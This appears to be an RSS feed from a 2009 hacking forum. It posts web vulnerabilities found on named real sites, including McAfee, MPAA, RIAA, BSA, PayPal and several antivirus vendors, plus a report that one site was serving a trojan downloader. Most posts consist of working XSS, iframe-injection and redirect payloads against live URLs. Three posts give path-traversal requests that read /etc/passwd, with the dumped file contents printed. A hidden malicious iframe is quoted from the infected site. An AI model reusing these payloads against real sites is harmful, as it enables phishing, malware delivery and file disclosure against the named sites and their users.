    http://nemesis.te-home.net/Forum/3000_News/ Thu, 30 Apr 2009 20:06:27 GMT 3248884919
    <![CDATA[Multiple Bugs on McAfee Websites ]]> http://nemesis.te-home.net/index.html http://www.mcafee.com/us/images/pos/pos_aboutus.jpg

    I think it's not so easy :)

    Server XMLHTTP post request errors

    Code:
    http://www.mcafee.com/us/about/antipiracy_'


    Code:
    http://www.mcafee.com/us/enterprise/solutions/network_access_'


    Code:
    http://www.mcafee.com/us/security_'


    Quote:
    msxml3.dll error '80004005'

    A string literal was not closed. redirect[@org='www.mcafee.com/us/enterprise/solutions/network_access_'-->']<--

    /error-pages/cls_redirect_lib.asp, line 67


    http://img230.imageshack.us/img230/6020/72727083.jpg


    Iframe Injection

    Code:
    https://kc.mcafee.com


    Code:
    https://kc.mcafee.com/corporate/index?page=answers&type=search&searchid=1240943327683&question_box="<iframe src=index.htm


    http://img509.imageshack.us/img509/7641/92678129.jpg

    http://img2.imageshack.us/img2/2374/82240550.jpg


    XSS and Iframe Injection

    Code:
    http://www.mcafeerebates.com



    http://img17.imageshack.us/img17/34/29025695.jpg

    http://img17.imageshack.us/img17/4913/20094952.jpg

    On the same website - http://www.mcafeerebates.com/promocenter/mcafee/promo_search.html - redirect also works fine

    Example: -  try to put something like this:
    Code:
    "<META HTTP-EQUIV="refresh" content="0; URL=http://nemesis.te-home.net">
      in Date Purchased  or Rebate Offer Number/Promotion Code:  and then click Continue.

    You will be redirected to our website :)


    ]]>
    http://nemesis.te-home.net/index.html Fri, 1 May 2009 12:00:14 GMT 552486224
    <![CDATA[MPAA Website Vulnerable to XSS]]> http://nemesis.te-home.net/ http://mpaa.org/thank_you.asp.

    A screenshot to remember (for next year's April 1st) :
    http://img123.imageshack.us/img123/7020/mpaa.gif

    This vulnerability can be called from any website that has the following code:
    Code:
    <form name="form" action="http://www.mpaa.org/thank_you.asp" method="post">
    <!-- here we inject an iframe and an image from http://thepiratebay.org -->

    <input name="txtfavoritemovie" type="hidden" size="18" maxlength="1175" value="<IMG src='http://static.thepiratebay.org/img/tpb.jpg'><BR><BR><IFRAME width='100%' height='600px' src='http://thepiratebay.org/browse/200'>">
    <input type="hidden" name="name" value="1">
    <input type="submit">
    </form>




    WARNING: This is a proof of concept that proves an XSS on mpaa.org website and should be taken as a joke.






    ]]>
    http://nemesis.te-home.net/ Sat, 2 May 2009 20:32:15 GMT 3719881641
    <![CDATA[Bugs in RIAA.com Website]]> http://nemesis.te-home.net/ http://www.riaa.com/email.php
    Unprotected directory: http://www.riaa.com/classes/
    XSS: http://www.riaa.com/search.php
    Example for search string: \'><IfRame sRc="hTtp://mininova.org" width="100%" height="600px":
    http://img5.imageshack.us/img5/5491/riaab.gif
    Code:
    <form action="http://www.riaa.com/search.php" method="post"><input type='hidden' name='term' value='\'><IfRame sRc="hTtp://mininova.org" width="100%" height="600px"'><input type="submit" value="Browse torrents"></form>


    WARNING: This is a proof of concept that proves an XSS on riaa.com website and should be taken as a joke.

    ]]>
    http://nemesis.te-home.net/ Mon, 4 May 2009 09:36:30 GMT 3277379671
    <![CDATA[Securitydot website Infected with Trojan Downloader ]]> http://nemesis.te-home.net/
    Quote:
    SecurityDot is one of the most comprehensive and trusted source of security information on the Internet.

    http://securitydot.net/about.php  

    Report from Kaspersky Antivirus
    Quote:
    04/05/2009 13.32 Rilevato: Trojan-Downloader.JS.LuckySploit.m Internet Explorer http://202.73.57.6/tomi/?t=2
       

    Wepawet Report
    Quote:
    wepawet is a service for detecting and analyzing web-based malware.


    Analysis report for
    Code:
    http://securitydot.net/index.php
      

    http://wepawet.cs.ucsb.edu/view.php?hash=955727554381880de0b84cdc74200b87&t=1241433711&type=js


    Analysis report for
    Code:
    http://202.73.57.6/tomi/?t=2


    http://wepawet.cs.ucsb.edu/view.php?hash=126e867e49f9ce219122270f3125347b&t=1239907937&type=js


    This resource appears to be involved in the Luckysploit malware campaign.

    About LuckySploit http://novirusthanks.org/blog/2009/03/luckysploit-new-exploit-kit/

    Quote:
    </script>

          </td>
        </tr>
      </tbody>
    </table>

    </body>
    </html>

    <iframe src="http://fuadrenal.com/mito/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


    http://img21.imageshack.us/img21/2871/secp.jpg


    Quote:
    fuadrenal.com

    202.73.57.6 = dyn6-b57-access.superdsl.com.sg

    IP Location: Singapore  Singapore Web & Mail Hosting Company

    The following websites were found on 202.73.57.6:

    1qdwc0.davtraff.com
    24cn39.davtraff.com
    2a60wr.davtraff.com
    57yq57.davtraff.com
    5pwn36.davtraff.com
    6hoxw7.davtraff.com
    74ohfl.davtraff.com
    77198r.davtraff.com
    7ad12y.davtraff.com
    8zlnmc.davtraff.com
    9c72ea.davtraff.com
    acu7r6.davtraff.com
    albhz6.davtraff.com
    b3a42u.davtraff.com
    ckvw3z.davtraff.com
    donkxy.davtraff.com
    dq0cgg.davtraff.com
    e0wrb0.davtraff.com
    ec5l0i.davtraff.com
    eibw7n.davtraff.com
    enljz0.davtraff.com
    fzmwuj.davtraff.com
    g1o5eg.davtraff.com
    g9c0fz.davtraff.com
    gmn2c9.davtraff.com
    jf41c2.davtraff.com
    jjbjhr.davtraff.com
    joz5ul.davtraff.com
    k6evo9.davtraff.com
    ke8m40.davtraff.com
    lh18qs.davtraff.com
    myoxfh.davtraff.com
    np8fh0.davtraff.com
    oj44aw.davtraff.com
    p5uup0.davtraff.com
    ptrb84.davtraff.com
    qp485x.davtraff.com
    ri0lms.davtraff.com
    rla7d9.davtraff.com
    s101wg.davtraff.com
    srvd02.davtraff.com
    toolnw.davtraff.com
    ts9n6v.davtraff.com
    tx7zs2.davtraff.com
    u6wtp5.davtraff.com
    vd0lkq.davtraff.com
    vzjdcp.davtraff.com
    w2wnl1.davtraff.com
    wpy0go.davtraff.com
    y7k6cn.davtraff.com
    yahoo-analytics.net
    ycf18f.davtraff.com
    zhesky.davtraff.com

    Total: 53 websites.

    All websites serving malware,so be carefull if you try to enter

    We have found also some bugs like Cross site scripting and Iframe injection

    Vulnerable page:

    Code:
    http://securitydot.net/search.php?sch=sch&metaname=all&query="><script>alert(String.fromCharCode(88,83,83))</script>


    Screenshot of the Securitydot XSS and Iframe injection flaw

    http://img4.imageshack.us/img4/4909/85314584.jpg

    http://img4.imageshack.us/img4/9465/53849538.jpg


    This vulnerability can be used to perform phishing attacks


    ]]>
    http://nemesis.te-home.net/ Mon, 4 May 2009 22:37:12 GMT 1062740843
    <![CDATA[Faking Movie Ratings]]> http://nemesis.te-home.net/ is useless, an inconvenience for independent distributors. A bug in their movie rating search websites makes it even more useless.
    Affected websites (all hosted on same server as mpaa.org):

    An XSS bug in all these websites allow "smart marketers" to fake the ratings of a movie or trojan spreaders to infect website visitors.
    Vulnerable page (all sites): /content.asp

    Example:
    • Search string for the movie "Twilight Zone" to get the rating "PG":
      Code:
      twilight zone
    • Search string for the movie "Twilight Zone" to get the rating "NC-17":
      Code:
      twilight zone" size="25"></font></TD></TR><TR> <TD bgcolor="#5EAEFF"><b><font face="Verdana" size="1">Rating:         </b> <SELECT NAME="RATING" onchange="javascript:form1.submit();"><OPTION VALUE="%">ANY<OPTION VALUE="G">G<OPTION VALUE="PG">PG<OPTION VALUE="PG-13">PG-13<OPTION VALUE="R">R<OPTION VALUE="NC-17">NC-17</SELECT></font></TD></TR></TABLE></TD></TABLE><p align="center"><font face="Verdana" size="1"><!--<input type="submit" Value="Search">--> <img src=images/searching_blank.gif border=0 id="search" name="search" width="84" height="12" ></font></p><TABLE border=0 cellpadding=4 cellspacing=0><TR><TD colspan=2 ></TD></TR></table><td valign=top><td colspan="3" class="bodytxtmain"><span class="style1">Total : 1 </span></td></tr></form><tr><td colspan="3" valign="top" class="bodytxtmain"><div style="width:520px; height:400px; overflow:auto;"><table width="500" border="0" cellspacing="0" cellpadding="0" ID="Table12"><tr><td width="107" align="right" valign="top"><span class="red_txt"><font face="Verdana" size="1"><B>Title:</B></font></span></td><td width="10" valign="top"> </td><td width="383" align="left" valign="top"><span class="graybig_txt"><a href="http://www.imdb.com/find?q=Twilight+Zone+%2D+The+Movie" target = "_blank" class="graybig_txt">Twilight Zone - The Movie</a> (1983)</span></td></tr><tr><td width="107" align="right" valign="top"><span class="red_txt"><font face="Verdana" size="1"><B>Rating:</B></font></span></td><td width="10" valign="top"> </td><td width="383" align="left" valign="top"><span class="graybig_txt">NC-17</span></td></tr><tr><td width="107" align="right" valign="top"><span class="red_txt"><font face="Verdana" size="1"><B>Distributor:</B></font></span></td><td width="10" valign="top"> </td><td width="383" align="left" valign="top"><span class="graybig_txt">Warner Bros. Inc.</span></td></tr><tr><td colspan="3" height="1" background="images/bg_dotted.gif"></td></tr></table></div></td><tr><td colspan="3" valign="top" class="bodytxtmain"> <BR> </td></table></td></tr></table></td></tr></table></td><td> </td></tr></table></td></tr><tr><td><table width="100%" border="0" cellspacing="0" cellpadding="0" ID="Table13"><tr><td width="28" valign="top" background="_images/footer_bg_left.gif"> </td><td width="773"></td><td valign="top" > </td></tr></table></td></tr></table></td></tr></table><p align="center"><font face="Verdana" size="1">For bulk data exports or special requests, please contact <a href="mailto:WebHost@Mpaa.org"> WebHost@Mpaa.org</A></font></p><p align="center"><font face="Verdana" size="1"> Visit the <a href="http://www.parentalguide.org" TARGET="_new">Parental Media Guide</a> for parental advisory information for TV, Records, CD's and Computer, Video and Internet Games.</font></p><p align="center"><font face="Verdana" size="1"> © 2000 The Classification and Rating Administration. All rights reserved. <a href="privacy.htm">Privacy Policy</a><br>Site design by The Braverman Group</font></p></HTML><!--


    Of course, the form restricts the message length to 25 characters but an external website can call their script with more characters with no problems.



    WARNING: This is a proof of concept that proves an XSS on movie rating websites and should be taken as a joke.




    ]]>
    http://nemesis.te-home.net/ Tue, 5 May 2009 06:54:01 GMT 446533047
    <![CDATA[nupecc.org - LFI]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/
    Code:
    nupecc.org/index.php?display=../../../../../../etc/passwd%00


    Quote:
    root:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin pvm:x:24:24::/usr/share/pvm3:/bin/bash zope:x:475:475:Zope user:/usr/lib/zope:/bin/false apache:x:48:48:Apache:/var/www:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash gdm:x:42:42::/var/gdm:/sbin/nologin +::::::

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/ Tue, 5 May 2009 17:54:14 GMT 3703740314
    <![CDATA[Unionemollica.it - LFI]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/
    Code:
    http://www.unionemollica.it/view.php?file=../../../../../../etc/passwd%00


    Quote:
    root:x:0:0:root:/root:/bin/bash daemon:x:2:2:daemon:/sbin:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin postgres:x:26:26:postgres:/srv/pgsql:/bin/bash mysql:x:27:27:mysql:/var/lib/mysql:/bin/bash rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin rpc:x:32:32:Portmapper RPC User:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mailnull:x:47:47::/var/spool/mailqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emerge:x:70:70:Conary emerge build user:/var/conary/emerge:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin raa-web:x:91:91:rPath Appliance Agent:/var/lib/raa/:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin web:x:500:48:Web User Account:/srv/www/html:/usr/bin/scponly vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/ Tue, 5 May 2009 17:57:07 GMT 924374688
    <![CDATA[Alfa.hub.lv - LFI]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/
    Code:
    http://alfa.hub.lv/vhcp_alfa/?page=../../../../../../etc/passwd%00


    Quote:
    # $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin omega:*:1004:1004:User &:/home/omega:/bin/sh eT:*:7777:0:User &:/home/eT:/usr/local/bin/bash mysql:*:7778:7778:User &:/usr/local/mysql/user:/usr/sbin/nologin alfa:*:1003:0:User &:/home/alfa:/bin/sh ftpuser:*:5500:5500:User &:/usr/local/ftp:/bin/sh squid:*:100:100:Squid caching-proxy pseudo user:/usr/local/squid:/usr/sbin/nologin

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/ Tue, 5 May 2009 18:14:06 GMT 3218287779
    <![CDATA[VerliAdmin- v0.3.7 - v0.3.8 -Multiple Cross-site Scripting Vulnerabilities ]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    VerliAdmin-  v0.3.7 - v0.3.8 -Multiple Cross-site Scripting Vulnerabilities

    http://bohyn.czechweb.cz  

    - 5-05-2009

    - Methodman - http://nemesis.te-home.net

    -Example:

    http//:verliadmin.com/index.php?q=bantest&nick="><script>alert(String.fromCharCode(88,83,83))</script>  

    http//:verliadmin.com/index.php?nick="'/><script>alert(String.fromCharCode(88,83,83))</script>

    http//:verliadmin.com/index.php?q="'/><script>alert(String.fromCharCode(88,83,83))</script>

    http//:verliadmin.com/index.php?"'/><script>alert(String.fromCharCode(88,83,83))</script>  


    -Proof of Concept:


    http://alfa.hub.lv/alfa/index.php?q=bantest&nick="><script>alert(String.fromCharCode(88,83,83))</script>

    http://alfa.hub.lv/alfa/index.php?nick="'/><script>alert(String.fromCharCode(88,83,83))</script>

    http://alfa.hub.lv/alfa/index.php?q="'/><script>alert(String.fromCharCode(88,83,83))</script>

    http://alfa.hub.lv/alfa/index.php?"'/><script>alert(String.fromCharCode(88,83,83))</script>


    /teamelite 2009



    Mirror:

    http://packetstormsecurity.org/filedesc/verliadmin-xss.txt.html
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Wed, 6 May 2009 07:10:03 GMT 2330628629
    <![CDATA[VerliHub Control Panel - v 1.7e XSS & Iframe Injection Vulnerability]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    VerliHub Control Panel  - v 1.7e  XSS & Iframe Injection Vulnerability

    http://vhcp.verlihub-project.org

    -6-05-2009

    -Methodman - http://nemesis.te-home.net

    -Example:-  

    Cross-site scripting vulnerability on login page

    http://vhcp.com/index.php?page=login&nick="><script>alert("Vulnerable");</script>  

    http://vhcp.com/index.php?page=login&nick="><iframe src=http://nemesis.te-home.net/index.html?news></iframe>


    -Proof of Concept:-

    http://wiretransfers.net/index.php?page=login&nick="><script>alert("Vulnerable");</script>  

    http://wiretransfers.net/index.php?page=login&nick="><iframe src=http://nemesis.te-home.net/index.html?news></iframe>


    Vulnerability that can be used to perform phishing attacks

    [so verlibug sucks++++ =))]

    /teamelite 2009


    http://img7.imageshack.us/img7/4660/vhcp.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Wed, 6 May 2009 08:10:23 GMT 2753693124
    <![CDATA[You Wouldn't Sue a Search Engine]]> http://nemesis.te-home.net/
    http://img79.imageshack.us/img79/5808/mpaasearch.gif

    Someone may ask, "Why are there two searches on MPAA's website? Is there any difference between those 2?"
    Searching for "test" ...

    http://img105.imageshack.us/img105/9393/mpaatest1o.gif

    So, one search is for movie ratings (as the text says). Let's see what the other one is about. Searching again for "test"...

    http://img212.imageshack.us/img212/9505/mpaatest2.gif

    Interesting results. Let's click on "Full featured example", as a test.

    http://img212.imageshack.us/img212/9616/mpaatest3.gif

    Where is the word we searched for? Interesting address - /test/sitesold/modules/tinymce/tinymce/ - was that supposed to be public? A search for "license" lists license.txt for all installed modules. Searching for "admin" will not list any legal cases involving admins of torrent trackers, you'll get some of their admin pages listed as search results.
    Here are some results for some common search keywords:


    It looks like the "Search" link is one of those links nobody would ever want to click on that website. Almost any keyword returns results that are not meant to be seen by public. Do you want to find out more about their press releases ? Search for "press releases" to get pressreleaseswrong.asp.
    Searching for "thank you" reveals the way MPAA fixes bugs in their website: they don't correct anything, they just rename the vulnerable file. The new name for "thank_you.asp" is: http://mpaa.org/thank_you_old_05_2009_abdferkf324934lkasdf23493243kdfer.asp.

    Other search scripts found (using the keyword "search") :

    Their "Google search" is shown as "Google at its best". Sounds interesting. Let's see...

    http://img24.imageshack.us/img24/25/mpaatest4a.gif

    Doing a test search...

    http://img24.imageshack.us/img24/6074/mpaatest4d.gif

    Searching for <IFRAME src="http://google.com" width="100%" height="1000px"> ...

    http://img24.imageshack.us/img24/4427/mpaatest4b.gif

    This should be called "XSS at its best".
    ]]>
    http://nemesis.te-home.net/ Sat, 9 May 2009 18:11:51 GMT 1398113625
    <![CDATA[Multiple Vulnerabilities in MPAA Member Websites]]> http://nemesis.te-home.net/
    http://mpaa.org/AboutUsMembers.asp wrote:
    The Motion Picture Association of America (MPAA) serves its members from its offices in Los Angeles and Washington, D.C. On its board of directors are the Chairmen and Presidents of the six major producers and distributors of motion picture and television programs in the United States. These members include:

    Paramount Pictures Corporation
    Sony Pictures Entertainment Inc.
    Twentieth Century Fox Film Corporation
    Universal City Studios LLLP
    Walt Disney Studios Motion Pictures
    Warner Bros. Entertainment Inc.


    During our tests we found out that all these websites have problems that would allow someone with bad intentions to show illegal content in their name, to infect visitors with malware or to request credit card details from their users.
    No automated tools were used for testing, and we used Google for our proof of concept links. Maybe in the near future Google will improve its services to blacklist vulnerable websites as it already does with websites that infect visitors with malware or use browser exploits.


    ]]>
    http://nemesis.te-home.net/ Sun, 10 May 2009 17:43:22 GMT 4135429246
    <![CDATA[Vulnerabilities in Websites of 6 Antivirus Vendors enable Phishing Attacks]]> http://nemesis.te-home.net/index.html Symantec vs Kaspersky vs Eset-(Nod32) vs AVG vs F-secure vs Trendmicro

    hehe...  I know, someone is bored. We have found several bugs in the past few months, always on the same websites.

    So now still vulnerable and people still under threat? no doubt !

    Symantec.com  - XSS IE only

    Code:
    https://www.symantec.com/connect/endpoint-management-virtualization/forums}"><script>alert(String.fromCharCode(88,83,83))</script>?sym="><script>alert(String.fromCharCode(88,83,83))</script>

    http://img14.imageshack.us/img14/6118/95016577.jpg

    Altris.com  - XSS and Iframe Injection on search module

    why altris? look at this
    http://img14.imageshack.us/img14/9207/26362020.jpg

    Code:
    https://kb.altiris.com/display/1n/index.asp?c=&cpc=&cid=&cat=&catURL=&r=0.94508

    http://img141.imageshack.us/img141/4982/89773256.jpg

    http://img141.imageshack.us/img141/5645/90990231.jpg
    :)proof on concept  
    Search string
    Code:
    "<iframe src=http://kaspersky.com'><BR><BR><IFRAME width='100%' height='600px' src='http://kaspersky.com/200'>


    What about this ?
    http://img141.imageshack.us/img141/9535/97476447.jpg

    Kaspersky - XSS & Iframe Injection

    Code:
    https://support.kaspersky.com/en/PersonalCabinet3/Registration/Form/?"><script>alert(12157312.477)</script>

    http://img19.imageshack.us/img19/6135/60156390.jpg

    Code:
    http://support.kaspersky.ru/virlab/helpdesk.html?'"></title><script>alert(1337)</script>><marquee><h1>XSS</h1></marquee>

    http://img19.imageshack.us/img19/6545/42343404.jpg

    Code:
    http://support.kaspersky.ru/virlab/helpdesk.html?'"><iframe src=http://support.kaspersky.ru

    http://img9.imageshack.us/img9/4616/25204393.gif

    Works fine also Redirect to other website

    Linkscanner.avg.com - Critical XSS

    http://img14.imageshack.us/img14/2204/17343281.jpg

    Eset.co.il - Iframe Injection

    Code:
    http://www.eset.co.il/home/doc.aspx?mCatID=9904&rgid=151&strSearch="<iframe src=http://symantec.com><BR><BR><IFRAME width='100%' height='600px' src='http://symantec.com/200'>

    http://img528.imageshack.us/img528/7952/42032489.jpg

    F-secure.com - XSS & Iframe Injection by Vektor

    Vulnerable Page
    Code:
    http://www.f-secure.com/en_EMEA/about-us/contact-us/feedback/

    http://img18.imageshack.us/img18/651/38893606.jpg
    http://img155.imageshack.us/img155/6127/fgoogle.gif

    WARNING: This is a proof of concept that proves an XSS bug in f-secure website.


    Trendmicro.com - XSS & Iframe Injection

    Vulnerable page:
    Code:
    http://trendmicro.mediaroom.com/index.php?s="><script>alert(String.fromCharCode(88,83,83))</script>

    http://img10.imageshack.us/img10/9504/trendp.gif
    xss and Iframe injection  on search module
    Warning ! This is only a Proof of Concept So We Will Not Be Responsible for Any Damage

    ]]>
    http://nemesis.te-home.net/index.html Sun, 10 May 2009 21:05:24 GMT 2948635045
    <![CDATA[Multiple Vulnerabilities in BSA.org Website]]> http://nemesis.te-home.net/
    http://www.bsa.org/Privacy%20Policy.aspx wrote:
    We take strong precautions to protect your data from loss, misuse, unauthorized access or disclosure, alteration, or destruction. When BSA employs subcontractors that may have access to personal information, they are bound by a confidentiality agreement to ensure that they exercise the same level of care when handling your personal information as we do.


    http://www.bsa.org/country/Public%20Policy/Security.aspx wrote:
    Information transmitted over networks must be secure from thieves and hackers. The success of the global information society is largely dependent upon the faith and trust that users place in the Internet. BSA supports user education about network security and cyber crime.


    Some vulnerabilities in bsa.org allow someone with bad intentions to show illegal content in their name, to infect visitors with malware or to request credit card details from their users.

    WARNING: The following links and forms are presented as a proof of concept and they don't represent the views of the affected website.
    •  

    • XSS in 404 page: http://www.bsa.org/sitecore/notfound.aspx?item=%2fcountry%2fbsa+and+members/%3C/div%3E%3C/div%3E%3C/div%3E%3Ciframe%20style=%22position:absolute;top:0;left:0;z-order:1;%22%20width=%22100%%22%20height=%221000px%22%20src=%22http://www.google.com%22%3E%2fcontact+bsa&user=extranet%5cAnonymous&site=website
      http://img154.imageshack.us/img154/374/bsa.jpg
    •  
      XSS in BSA member registration page (http://w3.bsa.org/requestmemberaccess.cfm) :

    • Full path disclosure: http://www.bsa.org/geoip
    • ASP.NET debugging information:
      • http://www.bsa.org/EmailPage.aspx, click "Send" without completing the form to get ASP.NET debugging information.
        Quote:
        Server Error in '/' Application.
        Error invoking function 'SendMail' for control 'Button_1' where event is 'OnClick'  SendMail - 'From' field cannot be empty
        Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

        Exception Details: System.Exception: Error invoking function 'SendMail' for control 'Button_1' where event is 'OnClick'  SendMail - 'From' field cannot be empty

        Source Error:
        An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.


        Stack Trace:

        [Exception: Error invoking function 'SendMail' for control 'Button_1' where event is 'OnClick'  SendMail - 'From' field cannot be empty]
           Sitecore.Modules.Forms.BaseForm.ExecuteFunction(FunctionInfo function, Control sender, String EventName, EventArgs args) +1059
           Sitecore.Modules.Forms.BaseForm.InvokeEvent(Control sender, String EventName, EventArgs args) +370
           Sitecore.Modules.Forms.BaseForm.ProcessEvent(Object sender, EventArgs e) +112
           Sitecore.Modules.Forms.BaseForm.EventHook(Object sender, EventArgs e) +9
           System.Web.UI.WebControls.Button.OnClick(EventArgs e) +105
           System.Web.UI.WebControls.Button.RaisePostBackEvent(String eventArgument) +107
           System.Web.UI.WebControls.Button.System.Web.UI.IPostBackEventHandler.RaisePostBackEvent(String eventArgument) +7
           System.Web.UI.Page.RaisePostBackEvent(IPostBackEventHandler sourceControl, String eventArgument) +11
           System.Web.UI.Page.RaisePostBackEvent(NameValueCollection postData) +33
           System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1746


        Version Information: Microsoft .NET Framework Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433
      • http://www.bsa.org/Search%20Results.aspx?search_text=&searchlang=test&x=0&y=0 (view source, search for "SwitchLanguage")
      • http://www.bsa.org/xsl/BSA%20Search%20Results.xslt
    • Full path disclosure and debugging info:


    Update: XSS found in http://www.bsacybersafety.com/ :



    ]]>
    http://nemesis.te-home.net/ Mon, 11 May 2009 22:28:11 GMT 19209777
    <![CDATA[PayPal again vulnerable to XSS ]]> http://nemesis.te-home.net/ Paypal.com

    Registration paypal.com vulnerable to XSS ,Iframe Injection  and Redirect

    Vulnerable page:-

    Code:
    https://registration.paypal.com/welcomePage.do?partner=PayPalUK&bundleCode=C3&country=


    POC:-

    Code:
    https://registration.paypal.com/welcomePage.do?partner=PayPalUK&bundleCode=C3&country="><script>alert(String.fromCharCode(88,83,83))</script>

    then CLICK continue


    http://img9.imageshack.us/img9/3801/89855532.jpg

    http://img9.imageshack.us/img9/8461/54961825.jpg

    http://img9.imageshack.us/img9/1530/28942901.jpg

    Proof of concept  Video Demonstration

    http://www.youtube.com/watch?v=wRYGFomNtz4


    PayPal UK MediaCenter - XSS ,Iframe injection and Redirect
      
    Iframe and Redirect on search module.
    http://img239.imageshack.us/img239/1594/26271935.jpg  

    XSS

    Code:
    https://www.paypal-press.co.uk/content/default.asp?NewsAreaID=2&LocaleID='"></title><script>alert(Methodman)</script>><marquee><h1>XSS</h1></marquee>


    Code:
    https://www.paypal-press.co.uk/imagelibrary/detail.asp?MediaDetailsID="'/><script>alert(String.fromCharCode(88,83,83))</script>



    The same problem also on https://www.paypal-press.fr
    http://img168.imageshack.us/img168/7154/78264670.jpg

    Paypal Staff has been alerted about this.
    Warning ! This is only a Proof of Concept So We Will Not Be Responsible for Any Damage
    ]]>
    http://nemesis.te-home.net/index.html Tue, 12 May 2009 15:22:12 GMT 4292586582
    <![CDATA[Update: Vulnerabilities in Websites of 6 Antivirus Vendors]]> http://nemesis.te-home.net/ Vulnerabilities in Websites of 6 Antivirus Vendors enable Phishing Attacks.

    All Antivirus vendors except Symantec corrected the problems, some of them didn't admit that they had a problem but they all corrected them. From all companies we notified, we got only 1 response from Trend Micro,

    Rik_Ferguson wrote:
    Hi,
    This is Rik from Trend Micro. Just wanted to thank you for highlighting this flaw and to let you know that we had it fixed by 00:27 UTC on the 12th May.
    Thanks again for bringing it to our attention.
    Best,
    Rik Ferguson
    Trend Micro


    According to The Register, Symantec fixed last month the XSS found by Methodman on their 404 page.

    The Register wrote:
    Symantec said the reported vulnerability on its site was discovered and fixed last month. "Symantec was notified of a reported security vulnerability on a webpage within Symantec's website back in April," a spokeswoman explained. "Upon notification of the potential vulnerability, Symantec immediately conducted comprehensive testing and fixed the vulnerability. Symantec takes the security of its website very seriously and can confirm that no company or customer information was exposed."


